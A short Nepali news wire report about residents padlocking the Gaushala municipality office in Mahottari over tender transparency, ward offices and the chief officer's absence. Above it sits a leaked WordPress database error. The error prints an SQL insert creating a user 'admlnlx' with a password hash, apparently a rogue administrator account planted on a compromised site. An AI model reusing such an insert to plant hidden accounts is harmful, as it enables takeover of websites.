WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Byv7U/ioNeoJ54qvVXv1/DACpqAGfs/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 12:06:27', '', 'admlnlx', 'admlnlx')
महोत्तरी, माघ २५ –
कार्यकारी अधिकृतले मनपर्दी ढङ्गले कार्यालय सञ्चालन गरेको भन्दै स्थानीयवासीले महोत्तरीको गौशाला नगरपालिकामा तालाबन्दी गरेका छन् ।
उनीहरुले तीन बुँदे माग राख्दै कार्यालयको मूलढोकामा तालाबन्दी गरेका हुन । गत माघ २० गते नगरपालिकाले निकालिएको बोलपत्रआह्वानको नतिजा पुनः परादर्शी ढङ्गले निकाल्नुपर्ने, प्रत्येक वडामा कार्यालय स्थापना गरी वडा सचिव खटाउनुपर्ने र कार्यालय प्रमुखले नियमित रुपमा कार्यालयमा उपस्थित हुनुपर्ने माग स्थानीयवासीको छ ।
कार्यकारी अधिकृतसंग यी समस्या समाधानका लागि पटक पटक आग्रह गर्दापनि त्यसलाई बेवास्ता गरेकाले बाध्य भएर कार्यालयमा तालाबन्दी गर्नुपरेको नागरिक वडामञ्चका पूर्वअध्यक्ष नवीनकुमार साहले बताउनुभयो ।
नगरपालिकाको मूलढोकामा तालाबन्दी भएपछि सेवाग्राही मर्कामा परेका छन् । – रासस